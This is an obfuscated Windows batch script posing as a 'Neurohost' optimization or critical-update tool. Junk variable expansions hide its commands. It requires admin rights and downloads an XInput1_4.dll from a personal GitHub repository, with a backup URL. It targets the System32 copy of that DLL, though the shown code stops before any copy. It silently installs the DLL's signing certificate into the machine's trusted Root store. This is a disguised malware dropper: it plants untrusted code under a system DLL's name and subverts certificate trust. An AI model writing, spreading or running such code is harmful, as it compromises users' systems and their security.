e%gWQHJIxVH%c%x%h%KOlr%o%SLyO% %qND%1%jNMsTwO%.%st% %bHmZUKCJB%A%h%p%lfEA%p%Le%l%cy%y%a% %zZWeUNh%O%iWx%p%DOYaFUkUu%t%NPXocaFNz%i%hPHDDVr%m%Ru%i%ybLyxMMlYU%z%zv%a%lh%t%T%i%qszVobEJ%o%pO%n%QpRTRvQRlh% %eYYBRBfa%(%Ks%C%SXWiy%r%JUsUuPTl%i%bgKg%t%BRj%i%HTSrSvo%c%MS%a%HsX%l%cAiBPx% %lZDjk%U%w%p%xTmF%d%D%a%wgHafASDtL%t%gVqYCIw%e%LoyWJ%)%i%
e%Q%c%E%h%bzPXdoZ%o%nWXO% %FYsgsmyO%2%WUIRASeRE%.%ahJLPXRKHy% %K%A%f%p%StNniJtTnd%p%tNTyUejiTL%l%s%y%gfGRvSI% %ea%O%bE%r%EQAUW%i%rbrWMlvNjG%g%txyEXHN%i%eXvsinK%n%XoJmZCwW%a%bdo%l%nOuntzdgC% %owYrs%(%eh%B%ZjQgP%a%bHkZs%c%ePyMUrKsXD%k%MR%u%JHDnOgP%p%WgS%)%SbwzYDZISF% %HA%R%SFVMrBfqgi%e%X%p%GObLBhLZT%l%s%a%lUBtFpJooP%c%SKemT%e%XDt%
e%cQU%c%sxvkik%h%QIORehpFGH%o%YJyZ% %EX%3%HI%.%mmYdryP% %kYjXt%E%mEOfoHGzyp%x%xprOL%i%p%t%aYsWf%
e%uqOPyFQ%c%XKB%h%mPeoSIqY%o%k% %wutuLc%=%bUh%=%BzgofzRn%=%oANT%=%CiKRLt%=%g%=%OSjHqhjlhb%=%brX%=%asYaRNWqx%=%beRTitvK%=%DTriinLd%=%zaOrdsYUcu%=%TDC%=%LoipHag%=%xkSej%=%cM%=%HwEWaWo%=%tT%=%lQPwils%=%mq%=%R%=%Bd%=%iFpg%=%VmTqn%=%gRmcnMeGH%=%FYCxlW%=%iPBnZABK%=%chIABsTtA%=%UECh%=%jExtDRidhJ%=%AazmqAZy%=%JyevCV%=%kLR%
set /p choice="Select an option (1-3): "
s%c%e%hnYXhs%t%YGe% %hjdR%/%LqM%p%VvftPKcJhl% %XxXX%c%wI%h%UtxNmPq%o%ffW%i%oI%c%xArtLbu%e%UHdqHngIa%=%vuxHEsvvKz%"%zKujkO%S%jIDgCuxv%e%Q%l%TMF%e%W%c%aVCQ%t%mKQfuE% %nXmLr%a%MYLagjTr%n%jmm% %taUyTFIpV%o%CEoLMKHtwx%p%umnMMFD%t%uSkOcV%i%DBEoYf%o%OQgHVdWA%n%LHVEqal% %kmxZqc%(%Oh%1%oSxSxwfU%-%iS%3%SLbuc%)%dOu%:%yMlKUWi% %QZckXEoq%"%nm%

i%mmX%f%WoMEyA% %jbUjIN%"%HrsMh%%choice%"%VWcweG%=%qqPSvw%=%TQwHhK%"%ujVqfSGut%1%POpwfGzq%"%yniiF% %BRYFz%g%bFjm%o%wwD%t%mVzaHhL%o%fUUC% %pEAgDvMoy%r%qxaq%e%n%p%G%l%rMrscgIg%a%dpH%c%yayjSk%e%EmWI%
i%ZbNZ%f%xG% %nkENK%"%mIdA%%choice%"%XZLMCWFkPF%=%HCNVFnt%=%JpXTtxskw%"%N%2%M%"%YeRDbL% %Cakj%g%kXsJpOBVf%o%EHyWJdov%t%TXJALM%o%xUNeOjQf% %s%r%H%e%qQPxzy%p%mPg%l%ZivmQFV%a%MQNCSvV%c%JzCTxmJN%e%iyTBRtiJxU%_%oPBSyMPh%b%jRM%a%gJy%c%xiwP%k%ZJ%u%jjXm%p%XZLkUpmT%
i%RZoTz%f%CZpGfgV% %Jp%"%ieSdsDxi%%choice%"%lPQT%=%nTqttOm%=%bsuf%"%URUrB%3%dV%"%qkHyIft% %DJnsOa%e%xdxNdXyU%x%utUpTaNY%i%cyCNyOVeHg%t%qgi%

g%kcbvnzNN%o%piML%t%oaLIbLY%o%vXEMHmxVsG% %FwQFaA%m%KqFaFhu%e%rscoi%n%eBKE%u%X%

:replace
:%IdedSKEmZC%r%YvPFYTiQR%e%MPLePKR%p%oQ%l%YKPp%a%qignXv%c%V%e%hyQglMVlhu%
set "dll_url=https://github.com/dadajjjjakd11/Neuro/raw/refs/heads/main/XInput1_4.dll"
s%BvrPQXr%e%zX%t%mE% %TScfj%"%sfkDGwu%d%zJceSf%l%xKVlLdwWHi%l%GxcM%_%eBR%u%DfIA%r%FsVY%l%bN%=%DptOjoIgVG%h%tSBkV%t%YwE%t%QI%p%XCV%s%CtS%:%TNhyjSc%/%A%/%xfLXH%g%QdtTniRMx%i%RDd%t%xt%h%BVxiSx%u%PsQuyPQgG%b%LmkSfgZmdz%.%xmIZOzrQ%c%RE%o%SQnoEQm%m%bjWNuo%/%BqCcQWi%d%ITdGA%a%Pvd%d%IrYJNWJP%a%FquSkj%j%haY%j%oqGxTSvZRc%j%ddWPv%j%EbxWTtEOw%a%pGov%k%g%d%n%1%MRVe%1%toCXVj%/%oJq%N%CIY%e%yazpu%u%LLVlfOv%r%IOiL%o%luetLrW%/%orI%r%jW%a%GfTg%w%DW%/%jF%r%ZljFr%e%QgAh%f%psPKQPCwt%s%fDFYRWKw%/%vKKwJKfDhl%h%NChskYjDqA%e%ZTSST%a%qolLRziC%d%JREvY%s%gtk%/%fCSx%m%ovvLOj%a%XfpBxqWLrB%i%yQsxz%n%VXzYZpi%/%DVn%X%TyzlNwyKwM%I%WjuSQhNx%n%DxeSbQHAr%p%NQLKX%u%gc%t%Wcqlen%1%J%_%TpeQXTg%4%Wqlg%.%Jk%d%F%l%K%l%DgXIDL%"%qGUgHwl%
g%b%o%kVK%t%NHqla%o%bxtC% %OyJIsK%d%zIVOtp%o%u%_%kXG%r%oy%e%noQ%p%umXxSXNT%l%QdN%a%evRqTZ%c%Bfcatxv%e%xHfzUrhry%

:replace_backup
:%SIQOuO%r%cbWRSLMGU%e%V%p%JwplA%l%XosrRA%a%Aqka%c%mcLUcffxJH%e%AAGzR%_%CO%b%w%a%Xs%c%NEGAGP%k%DjyfZ%u%q%p%hacszUK%
set "dll_url=https://github.com/dadajjjjakd11/backup/raw/refs/heads/main/XInput1_4.dll"
s%lCdehp%e%BeCyChYKHS%t%CnNRohhqYW% %rzMCk%"%oErLKhev%d%LwvlIkVveY%l%gaNMus%l%OBdM%_%CnbidtU%u%stEN%r%SvdJCVkX%l%NeVkG%=%KdXelyXWkC%h%B%t%DNbjXWiG%t%kPA%p%kkouHzso%s%oRhklX%:%QpPuogJ%/%boJeAqdO%/%uCnL%g%Eh%i%VJuDSu%t%hvbc%h%vOBvE%u%agVdvPYIQ%b%nQtkoxBon%.%CwC%c%dO%o%hEB%m%sma%/%VmpXOpXzKj%d%lIYI%a%iIc%d%jOpznwal%a%s%j%ycgw%j%O%j%IifCSo%j%fyszoFruG%a%x%k%ueGXBtwI%d%QFeYSaSZT%1%aQnmimICWi%1%tIhlWpHhq%/%n%b%miqqco%a%jrlxNu%c%eHZ%k%aUu%u%fDYXyWwf%p%yLULhBY%/%rDvALnO%r%yJOOba%a%IRaOKM%w%vrMZPMA%/%jcrnk%r%OfFUpmeTJ%e%dJN%f%HZCsGdAFjK%s%HYsWWdOjhk%/%fxrDLbWGER%h%nj%e%hAxri%a%ABDwUoI%d%bCIqSgDLD%s%hJotmUpqM%/%alKZX%m%ZKSMrMvwmB%a%AVbg%i%ozi%n%vLyGJdd%/%pygvEG%X%nORkBhOv%I%RQWGdPQ%n%jThoXFVYE%p%kzHvLBlYZk%u%lWFmag%t%nvp%1%fxKRY%_%qkFFFyjdK%4%fcb%.%qnWFAWQqO%d%NNzbO%l%elup%l%fbxCMFcim%"%XTjLam%
g%wIzvUtVi%o%hDqHnHbvjx%t%osjXzCdgPT%o%kHgy% %lIOWUX%d%UxoLh%o%tiKsLu%_%HIZYnoBRK%r%bIACSU%e%SHbGHLhZgL%p%Jm%l%gArLWRMz%a%wcITeEM%c%I%e%KA%

:do_replace
:%fl%d%fkREr%o%dDcpPhiE%_%NyiRmaTVom%r%IeDnbpDmn%e%FLueQVAu%p%FkULtaqp%l%BLHf%a%Z%c%bAZCiTfC%e%yeQjFpz%
c%HL%l%MxJjBN%s%TwyJbfbEm%
echo Neurohost Module: Applying update...
e%hJDlwW%c%dVAiRUaFOv%h%guDIzAz%o%pyJMykDA% %Pp%N%uTzfYk%e%s%u%AOgxLUs%r%FelCIBBySV%o%gNaTzn%h%lXUH%o%tkGcqx%s%EHJqnIgNmq%t%UIyxusnEyc% %EPTgNVNlpZ%M%IvLpI%o%PuT%d%ednjWgFmg%u%X%l%kYNR%e%XQjhHdccvb%:%YmsFJP% %hvenhDx%A%FQNwK%p%rxtNCPEl%p%odOMvrPcvO%l%i%y%eFVb%i%J%n%H%g%ghQ% %WmDcve%u%abF%p%jPlvvbtHxO%d%AEluA%a%ulSXIGxQe%t%XRcNBnTo%e%UXtNnJ%.%IZ%.%vnIzTqalq%.%bCjdNXAv%
e%PvqTOkDT%c%vcedboVK%h%gqKl%o%LEUArtllV% %yARhk%=%UPahGBV%=%YhhYJ%=%YA%=%mzNPlDUN%=%nrZv%=%ymAl%=%uk%=%g%=%cXVGTuj%=%VtTnMtJV%=%mVcL%=%eDgBEoy%=%m%=%eMcCzP%=%f%=%F%=%RygmUlY%=%EmVbc%=%hAzrkhc%=%ZceusASZ%=%qPbETj%=%tGdLT%=%UElyKgXR%=%aFM%=%B%=%PZrOAQ%=%jClUACrVn%=%J%=%fmKQz%=%jSb%=%LMElpY%=%zdP%
echo WARNING: This action will apply system-level optimizations.
e%gXjDyrLADT%c%jezKBkiI%h%NRDn%o%KwVCHv% %cPKPT%W%EUsR%A%CxqDq%R%SUCanKnCy%N%LfeHr%I%bNDQoisxP%N%hWnPWknspp%G%F%:%EAAHCj% %BsYsHfL%T%bNqYABG%h%ILhKyL%i%zPflnf%s%VPixEex% %DgFsQxpFjD%a%qaPsBv%c%MgV%t%jupEgy%i%WnpCs%o%htBoEHEAv%n%G% %v%w%rztYVjnhKB%i%xXEMKny%l%n%l%RqGS% %F%a%GWpEY%p%a%p%noudEP%l%mdWsns%y%bJCcjwuPpA% %rXOk%s%UFOOi%y%ruLOpfx%s%zmfD%t%Lhnenbv%e%UfOvjMzjR%m%yoGvWo%-%PvmrLGM%l%IduXb%e%nj%v%SqLag%e%IwSGTRwlNH%l%mVPRBfu% %TeWNjK%o%bme%p%SgG%t%Q%i%OchE%m%nPKwZLl%i%ZudxoqjpAe%z%OcqznnXky%a%qyP%t%a%i%QoUKGsS%o%zlA%n%PdwYfgD%s%T%.%SxLH%
e%QZjF%c%Vo%h%lSyiEo%o%UixZ% %ABb%P%BScqg%l%LVjjJzQck%e%PHFDm%a%UvNoZS%s%opMHUr%e%XjZ% %CMQQ%e%DXXnlYtz%n%Z%s%HhsKSgtYE%u%LZeAPAANc%r%CjvjH%e%cTXNalRs% %KSzXOmlt%a%DhIUCKM%l%DVWcfbjBR%l%WogduvxSK% %Kx%p%yCbTzpeQr%r%FQFek%o%olXgZ%c%QZeYVg%e%jck%s%LcyHp%s%IkECziLTY%e%vyC%s%DHbT% %qhKUbmWTgh%a%QE%r%KGURSe%e%CtT% %fgMHMjhnSz%c%EMlUfo%l%MLwAJWmZiz%o%rbQuWmDkJ%s%vnNDS%e%jskSR%d%zeFMJiKT% %nlsRB%a%cAQEwsn%n%IyvunqVgOp%d%JYkRfKDCZI% %rcucpW%p%NGk%r%XvL%o%NSlEem%c%EhlIkWH%e%AqLruur%e%ZBwgCnOs%d%Fhb% %K%o%a%n%qs%l%k%y%pNQvarfxDS% %JD%i%VXWkcjjsZ%f%VKXw% %GCG%y%iBUGTma%o%UmlAya%u%bgV% %meHEnEGlx%a%XyT%r%htYX%e%dhqxT% %N%r%sPoNLkSy%e%vllE%a%bYtOSK%d%HjgyaKuW%y%CQ%.%vztA%
e%psfLkLQv%c%j%h%QhHMvdA%o%ZuWkiyV% %CzqJOj%=%QhqdDbmqkh%=%lhDv%=%t%=%oT%=%qRgyZip%=%oUrfdlflLA%=%OuvOujQC%=%hHKYUI%=%lUQe%=%JiC%=%FKvamr%=%kRPe%=%SZbUI%=%o%=%ZkZFAe%=%thn%=%AvMs%=%jKOL%=%RcfjQ%=%KKnFm%=%Z%=%ZtV%=%AbuL%=%eqOgnAeH%=%gCdWaygS%=%FIbujcDEV%=%XcTylGkrN%=%N%=%DfmoGKV%=%MxeAivCA%=%o%=%AJXJuz%

:: Check for Admin Privileges
:%nCdkwMc%:%EqmR% %XoHxoDOnkd%C%uxDVXZy%h%hmIK%e%uoccviJSFf%c%aNCgfMSH%k%ConOXso% %Po%f%LLVyLpLQ%o%AjCAgyep%r%gSaN% %dpTTPAJiN%A%h%d%ImeN%m%Xhz%i%Uoi%n%LbruQFeRcV% %llQ%P%ghWBac%r%pbBmiAIH%i%VimgRfU%v%Hui%i%KiyiZt%l%gKJmCtn%e%EiaXPaXKD%g%OlaUdHF%e%lHsF%s%W%
n%ACRr%e%DTmqVCRV%t%VJUCjTeBDs% %mRVelF%s%iShgJdnE%e%rWIIs%s%aUQ%s%ju%i%eXcrPJTte%o%ThB%n%THLO% %RC%>%DuNgsXioJ%n%Vl%u%iLO%l%P% %dlGOmNQiVi%2%gjw%>%mORJrWFa%&%iTUZqrDzh%1%tgjsOcAEW%
i%oLo%f%aqyyMME% %AJwwB%%errorlevel% %PBTLvDMDnm%n%bFVF%e%tAHtTCBgI%q%cboLuL% %VqKgy%0%TpA% %uh%(%QQpHVoV%
    echo ERROR: Administrator privileges required.
 %AoiJVq% %De% %RL% %XJAD%e%y%c%iUCYZAj%h%SbREz%o%PkSImdf% %rWchgNF%E%nhtSGgNz%R%q%R%uk%O%RLRd%R%EOgQAHQn%:%KVFKQy% %ChQiCKQA%A%PnkmKTZY%d%JbokWT%m%YBoFLiWQiT%i%VL%n%XkNIr%i%KlNZpO%s%gjIBCS%t%cV%r%x%a%WL%t%lfjYuiOf%o%GrI%r%ezhdwY% %QoXwZ%p%jSElGQE%r%oKjukckqna%i%sayHErc%v%fTrH%i%ODYM%l%O%e%wuJH%g%NAxAXnj%e%hdvces%s%SoxZS% %r%r%lMUltsvAg%e%mGFY%q%UkTNNbHvj%u%XrdORwQGZr%i%xKR%r%XMPkogQC%e%gsrcQdFggm%d%wRHUQU%.%ggAsEUoXPq%
 %Bj% %K% %OjXupR% %JAAytwTbX%e%tDZDkzw%c%LYZ%h%anP%o%KS% %xbKIcCs%P%zpQVwkW%l%zvXcQiW%e%PfKhNRqVN%a%LMgRNJgh%s%fbEqMisT%e%AvQuJeuV% %h%r%NDyuFuI%u%mxyd%n%zhaQAGf% %hNL%t%ovVnSZRjBw%h%B%i%T%s%eo% %SoSi%s%JeMEGed%c%HNsrZRrTWc%r%kuVk%i%hNLwL%p%mShCw%t%IxHjl% %C%a%dmFIspCmie%s%f% %AvTwDG%A%q%d%UoRmC%m%SdUgWOwU%i%hMoa%n%vEUlNEFGrM%i%QhQ%s%CULWd%t%vaZCZ%r%IvSJUWSaR%a%ahOP%t%Qyt%o%X%r%KRLUMqZr%.%KuJtvQ%
 %jKSdUZN% %ZYUpcc% %xqVzI% %Li%p%TbsTUOiWv%a%aNX%u%oDxauenls%s%hsrtGc%e%sM%
 %rcyYsn% %bV% %VIP% %uZGAXWWn%e%mTn%x%jEeIVJmHK%i%epfaW%t%jtXUiX% %rDoeQINuO%/%QFyBEdrX%b%WaPXc%
)%iu%

:: dll_url already set by replace or replace_backup
:%Tv%:%lYRttTHQrn% %xV%d%Y%l%UxXMmeO%l%gJrkxPnyR%_%F%u%T%r%RdPF%l%uEsTZLgIQK% %Kqn%a%eYYkQzr%l%fjRXZnVeFF%r%Wc%e%mRyvUAFC%a%qcBat%d%h%y%lGbZueeLIl% %Y%s%AAnKNlfmAn%e%ymuPns%t%BuMiVA% %QaB%b%emuexhBKs%y%KXAP% %Wbw%r%AiOlz%e%qwtuHmJ%p%TdjXoSHYjO%l%N%a%Pti%c%jXYEUMGT%e%MwnJeqQ% %LvqUp%o%ZlypEc%r%yMaxk% %CyLquGcKK%r%OGg%e%IAZxr%p%pnmZPZXXw%l%XCX%a%Hub%c%U%e%iOYbsY%_%ShlyIrr%b%SgSGvGCZYA%a%Retu%c%CK%k%EYZkoBGez%u%OvbocKVs%p%nytUPUHs%
s%czvlgZnpst%e%AmRXptV%t%o% %tQdL%"%iAvGbXPZCt%d%avrTWkbnZX%l%GrFeJ%l%qQUelqYmtd%_%jXM%p%RaIC%a%v%t%QhbG%h%oJ%=%xVkN%%TEMP%\%SqAMlRQ%X%QqrPng%I%P%n%COsGLsc%p%hqiuNSdcy%u%izP%t%qWy%1%MBhe%_%xSmpLweerR%4%jkc%.%sSwk%d%E%l%FKNAfLajIL%l%Zua%"%sGbNldavOE%
s%hAABS%e%vJyP%t%PnPeBQsDMD% %hQGcZ%"%ABI%s%pjGz%y%ci%s%DItZi%t%g%e%RpnuHnDj%m%U%_%hbXQ%d%NuQXK%l%S%l%Lsj%_%ep%p%JJyJLYONY%a%jxLlr%t%X%h%Ofjs%=%AIKzoOmOO%%SystemRoot%\%PVrxfwx%S%jbSFXufUAA%y%LgsXCIKEkr%s%NOcFw%t%YgRBgF%e%lAvj%m%RUm%3%GHbyIqz%2%tkGmzGAy%\%poo%X%kejGNmYCRE%I%aXMFuHDq%n%OKDCLjfEQ%p%pPOJ%u%Of%t%XF%1%cQQ%_%zKQuWf%4%Z%.%okQDZPFHH%d%Z%l%v%l%zrWxfy%"%i%
s%Blwdc%e%cCTYtUEwQZ%t%ZnpwWsCOoc% %F%"%LrjTueAdfK%c%tXMhH%e%pSDFqWyn%r%KdGsI%t%dxMaBCK%_%FCJbZTY%p%iwRQbbmz%a%wv%t%aNqRA%h%B%=%CHVN%%TEMP%\%mv%t%XXLvJSPO%e%lKhvab%m%Gljk%p%VYu%_%ocNK%c%Txrp%e%PQn%r%MPjE%t%yVzXZPTOIY%.%RAilQl%c%H%e%Lt%r%RSVucrLwz%"%xwOkYAYtPO%

:: Download the file using PowerShell
:%sML%:%AvIexmO% %rQBsdmlmK%D%PonIva%o%RbvhJqHuna%w%ERQvUGFzxs%n%gwyZitXX%l%WjB%o%iu%a%hUHXMyozF%d%gNAuOSci% %haBWws%t%YWxCf%h%aOAQxvsLxF%e%okrwgb% %nhFgCn%f%EQssYub%i%Ju%l%itY%e%cKjPMN% %i%u%PPYmA%s%pKijHjZII%i%jbGsmDtG%n%eZYlgBkHV%g%wtefYKahr% %vcBpILiZsc%P%FP%o%jE%w%yrOdszVp%e%I%r%NrHYL%S%LzOAx%h%OWuG%e%RNYwhzY%l%UjfKKwLDX%l%v%
e%qlXO%c%RJ%h%puhx%o%MYM% %FQaYFUBpbd%C%VHASRku%o%yhqtT%n%Z%n%ZxavnfBEd%e%EA%c%RZaXrqT%t%CXLzL%i%jCJuh%n%AooK%g%ufoCk% %OuSRLjRf%t%ZubrKZgE%o%CwVH% %Xlc%t%QJRXcVaraQ%h%PQlVsZ%e%EfdwTRUXOf% %bFuy%s%xmLCUlV%e%iPdWkVZcRq%r%doEaSPhWZ%v%ufhFQu%e%V%r%eVlYklTq% %zAopfdmGI%f%Z%o%uRQlJv%r%myJHf% %VPGFnrRQ%H%qpx%D%rI%N%ltQwimaEdF% %MRwsVXN%u%mvYicr%p%wksdM%d%WuWKn%a%jfEzo%t%tyOaaHwk%e%AOmiQYI%.%a%.%GvvkslDuP%.%ArvUCyFlUd%
p%OGEETdNI%o%EEcLU%w%lkbNmU%e%oFmnnQRgo%r%xQBbZ%s%yCPHeQYUpo%h%rLjYL%e%uphM%l%FtHECnDg%l%AUoo% %BHgxVe%-%ch%C%RocWG%o%VPZyPqLr%m%wCPpZolr%m%UjgaVX%a%HQXX%n%KPnx%d%NzjfuxQlb% %ZdokH%"%fmUXKuvN%&%IiTrEoMn% %XPnRGjSiQV%{%BkAMcRIR%I%LlI%n%p%v%GS%o%QnQSwEr%k%MOj%e%iuPrNAyj%-%oDd%W%ffSUZD%e%BOkQJ%b%TwqLWZ%R%WFfjB%e%ieVCowT%q%XRJGjy%u%YQedM%e%vlQjNlw%s%UFKEmAv%t%nozMM% %Z%'%mAmq%%dll_url%'%RBCXlN% %oA%-%jdqwPifq%O%CIGQEqcphC%u%iWRXsQ%t%eIvFGMF%F%tRFLISNrsh%i%Zfvvb%l%oTmnGT%e%paAHDura% %hfEvglGA%'%FJNg%%dll_path%'%Ap%}%S%"%bOe%

:: Check if the download was successful
:%lnnqEz%:%hY% %u%C%Yg%h%QsDgawh%e%Lu%c%SWu%k%ZiKPljrYxB% %dkCKuvffc%i%DhZKNIne%f%gBVmLs% %EvJorkpcHW%t%TXXbsTnEN%h%WPlt%e%uXxulASoA% %WgLeo%d%g%o%qwolKstOl%w%ErXo%n%GEZXdKm%l%ncUVtE%o%Jye%a%S%d%yChMjMKR% %LVGzMPN%w%DuPHIDHK%a%dqxHUSGufD%s%kZeNDf% %NOxqhjad%s%rnAUXTe%u%q%c%ehVN%c%JeF%e%ixHQn%s%RaR%s%uTELvIjcS%f%frRT%u%ViswWr%l%I%
i%kMPOBozxoH%f%AxPTRtGaa% %NzdMIWOAe%n%NvDT%o%KSTrEV%t%rLK% %OqCWvrCUr%e%IqpXAeEX%x%mjohCs%i%LkmAHhJST%s%rvGCBZx%t%mgW% %CJPJlnq%"%kkyhv%%dll_path%"%a% %yrYhsxPVgM%(%UeHo%
    echo ERROR: Download failed! Please check your internet connection or the link.
 %WHTErV% %yQYE% %bJJDjqWdoN% %zfCKcndILW%e%obItfKe%c%DigA%h%iUpjTYTke%o%KYDlIsElBo% %qdiiWoxGxt%E%TPf%R%wQz%R%lQEOKlSDE%O%c%R%L%:%meTCwURvyv% %QOEBSCH%D%yWC%o%KofBcSI%w%IZLlyalAk%n%GytSUwi%l%owP%o%uwxigNn%a%mBP%d%J% %IJvbqIU%f%JxzPbGL%a%aFqffervj%i%sxKIIIP%l%AIMQpYfN%e%Ctj%d%wRjxeNl%!%BEvh% %jyFoDP%P%wExxm%l%K%e%Sotdn%a%UUMGzo%s%fUSb%e%CrUFfk% %VwrgusN%c%rGAAiAkPo%h%wAzm%e%BmXSzsYyNy%c%sKqnxRqnm%k%zUhhLQYcC% %oq%y%sPbXnvaXU%o%Dr%u%Gqxz%r%rWJJW% %UdPiK%i%UAy%n%PhPsZiY%t%naRttFO%e%XWfVXP%r%z%n%JVH%e%TFLJRVCLb%t%nnrjI% %LH%c%yQhvERpnW%o%ruqeGKK%n%MIKWGwN%n%APnKMaAXXX%e%ykctuYE%c%sYphGGC%t%RoUNOXWm%i%QjEsEIHT%o%wjKTuB%n%jLft% %BkG%o%rNRysWxGT%r%hgd% %Woej%t%YpXAcuMS%h%yEmvRsJ%e%u% %xLyCuApkkM%l%sKfTX%i%GFCxi%n%YuUiZknTy%k%OOdCGQgJJ%.%qP%
 %XNst% %nEPAWqph% %wjcccsHi% %yBR%p%nI%a%iE%u%Q%s%MbF%e%ZWT%
 %dreaPxYVA% %gNrsroau% %FzkwRHa% %KpauF%e%mMtVpijLu%x%Kxu%i%sHcC%t%wNsCyAyy% %Gza%/%jgwyby%b%IThdH%
)%ehyueZwdOw%
echo SUCCESS: Update file downloaded.
e%UEkA%c%Bs%h%cyZaWmeN%o%uBUBaaVCa% %CSP%S%yNZXGR%U%QfQz%C%hffd%C%e%E%brdeJ%S%w%S%aDcnsNc%:%oyjnzkQjEM% %m%U%mXUGRU%p%nUQV%d%gvMR%a%msGdWowmsh%t%vNA%e%vjQIpf% %ZoEMpH%f%mTQYsap%i%pfhSk%l%JbWeBPQo%e%WUvzJzNv% %fqzbcPlvVY%d%d%o%RyWNmUapj%w%zKlRVZs%n%CgyTa%l%Pia%o%k%a%XP%d%AmbW%e%yJ%d%TXfRAsU%.%hbhEHc%

:: Silent Certificate Addition with Friendly Name
:%IbiQFdQzfp%:%N% %fklmectY%S%JtVtghll%i%StdP%l%vaBl%e%eOAjK%n%A%t%AEhBULvD% %FtSe%C%ZyObMQndw%e%LiJGvuJm%r%F%t%Wio%i%QbApUmX%f%FUncIgqXXN%i%S%c%WwA%a%pVOo%t%ObA%e%Ws% %AHp%A%uRHo%d%DIgxiUdphO%d%Gl%i%MYBzrc%t%m%i%pOySw%o%jMB%n%VGKmFhXN% %iLiV%w%V%i%xh%t%lIKZ%h%eBF% %OVOSwZIb%F%oPc%r%Pm%i%NWO%e%gC%n%UXYftsd%d%SQHYIqHnj%l%UEp%y%ljTXJcFTj% %QOKk%N%cJJFsplH%a%JZoYtf%m%VXH%e%PiCLAK%
p%nzDCinfn%o%v%w%WJmKchsnI%e%xCpIemf%r%YUJJ%s%o%h%EFtUfy%e%Y%l%lJ%l%hNABp% %RAez%-%Ct%C%kX%o%TKitVovz%m%qNks%m%j%a%IRr%n%ovbWKATE%d%VTxSe% %enrQTLMqYv%^%HnFS%
"%JW%^%zMrSuH%
 %AlamGMummM% %NGLopD% %TYZepMRfx% %iKNZn%$%v%c%rIsNjuMA%e%IZgdjjtDB%r%o%t%VWlXnbH% %xDc%=%yoyo% %OBJVfMSLVe%G%ylFYBasBul%e%Smc%t%nSu%-%KCq%A%iBD%u%lykclImz%t%HCimktgl%h%IzjX%e%dSQL%n%ovzJDUHg%t%pcEl%i%SAFUCZMA%c%vS%o%F%d%cD%e%PfmSZKwOiu%S%DX%i%fLstt%g%lxTTQpwS%n%HNYnNQQ%a%ySCPjcFBLt%t%jWzIfwjTy%u%OsqE%r%mCE%e%PIMpog% %kDURNq%'%ejKZZx%%dll_path%'%n%;%U% %IJPW%^%SURiQtCoo%
 %WcHBORQ% %Z% %rWm% %ywQJlo%i%TgxU%f%VSFnlRJDW% %eAycE%(%jFrHlyRaq%$%gtFfPWolXw%c%Aj%e%uNnLepBs%r%RjDwwide%t%SHsiBdLDJH%.%wPVh%S%iL%i%xeGht%g%ZFW%n%IIhvLqUgGd%e%gEgiDW%r%y%C%cyiGNioMuI%e%C%r%JxvhiPRvHf%t%fO%i%pQYXxfS%f%n%i%ejxz%c%mQKNlq%a%sPNXiWlSAP%t%NHjjvpP%e%MBMyGU%)%ZJoCO% %sIquQEMks%{%KBfOiusLVq% %AZWEyfF%^%AqvfogwqUS%
 %A% %uXbMNgu% %JfUmDsNNr% %sM% %NXHuASjx% %QGHAoIDjC% %mIytAfa% %FEI%$%kuPkkRTy%s%LO%t%ipDdk%o%FWW%r%G%e%QqlQTL% %fBqzgF%=%WQRdb% %ZwPIJuIK%N%WxRJYscEIL%e%fOasebjJ%w%h%-%sQn%O%MHgrtLMccG%b%hrS%j%WpoUdhHR%e%gTzofBbgc%c%iFJGQFXT%t%EKXor% %spToYobo%S%OP%y%uzQgnXf%s%BjHmupV%t%tatuJp%e%wQUkK%m%wqYriKBZq%.%NhcyvMHl%S%TmoWzWab%e%MyYez%c%s%u%OCRvaicrFk%r%Z%i%dqN%t%Redqkjp%y%WZGVXx%.%jFd%C%VhkQMT%r%VNi%y%Oq%p%KTASfaih%t%VIxIdUxZ%o%ARcIf%g%nUHKTxdbo%r%zbovLdJiHd%a%QyPyCYiRA%p%yriqVImG%h%xWLysVA%y%vqcana%.%V%X%FyKh%5%y%0%KP%9%hrOthSk%C%veNQdSY%e%n%r%nRi%t%uY%i%dmnuRupx%f%PLoZFDuWjg%i%wIC%c%jumni%a%w%t%p%e%OzEhEJHP%s%oigZRfElG%.%Pp%X%uIhgoLdTX%5%dzQaKun%0%hU%9%ekCPJL%S%BTEFAUP%t%HtIsuXR%o%Npla%r%uOwP%e%TcOT%(%BvEey%'%iizON%R%jTBEoodk%o%hrC%o%urP%t%aSAlQsF%'%LAe%,%ytsze% %uFzptRL%'%IWWkemAaVR%L%QKu%o%a%c%LiIdfxg%a%mJXT%l%KTzP%M%MxIX%a%yADgqwLDuf%c%TYBnEN%h%S%i%fDPsVx%n%ePdVMT%e%YPlsYDP%'%w%)%wOxuf%;%lVEyw% %XIE%^%DRZMALiNl%
 %vAgM% %w% %XRUND% %hkUhbawxfW% %aDf% %wHEzmSLzn% %zpxsZxq% %xGgcluPoz%$%K%s%sFXSbPh%t%iZEmzKJA%o%rEeDVkZ%r%dTwSPJ%e%CKhjiV%.%F%O%pGKj%p%yHmocUEO%e%gci%n%jwyJs%(%N%'%FfFgnL%R%z%e%jx%a%wPaxaKkx%d%gKXlzGMxhr%W%yKiSfuKP%r%G%i%vTKp%t%RXrccAfh%e%C%'%fIkIMmdF%)%BY%;%iBCvyE% %eacBsitKjY%^%RvOlbRo%
 %snVWwlVO% %riUyDEMNqC% %EOutwRd% %lfFveTSh% %hEVEyXuP% %ZVuSP% %Vx% %E%$%LoHvG%c%HKjMFajwQu%e%PMIFJBOks%r%u%t%kmmkxlq%O%fo%b%lWkMTzCV%j%jk% %xL%=%KYFiGE% %AMcqjHfmVp%$%YGCtIibGy%c%VVCsYAUDL%e%wSYpbA%r%BN%t%LkHeWc%.%Ykrmz%S%EEgURCT%i%XVCi%g%oktQ%n%VJMbRNlb%e%zWvNdVjJz%r%Q%C%YCk%e%U%r%loc%t%KXxCKuoxDA%i%vVhdhmcKl%f%Moh%i%ZCB%c%oXTEWY%a%A%t%mPbdDWk%e%LOnS%;%Eh% %GBP%^%Gni%
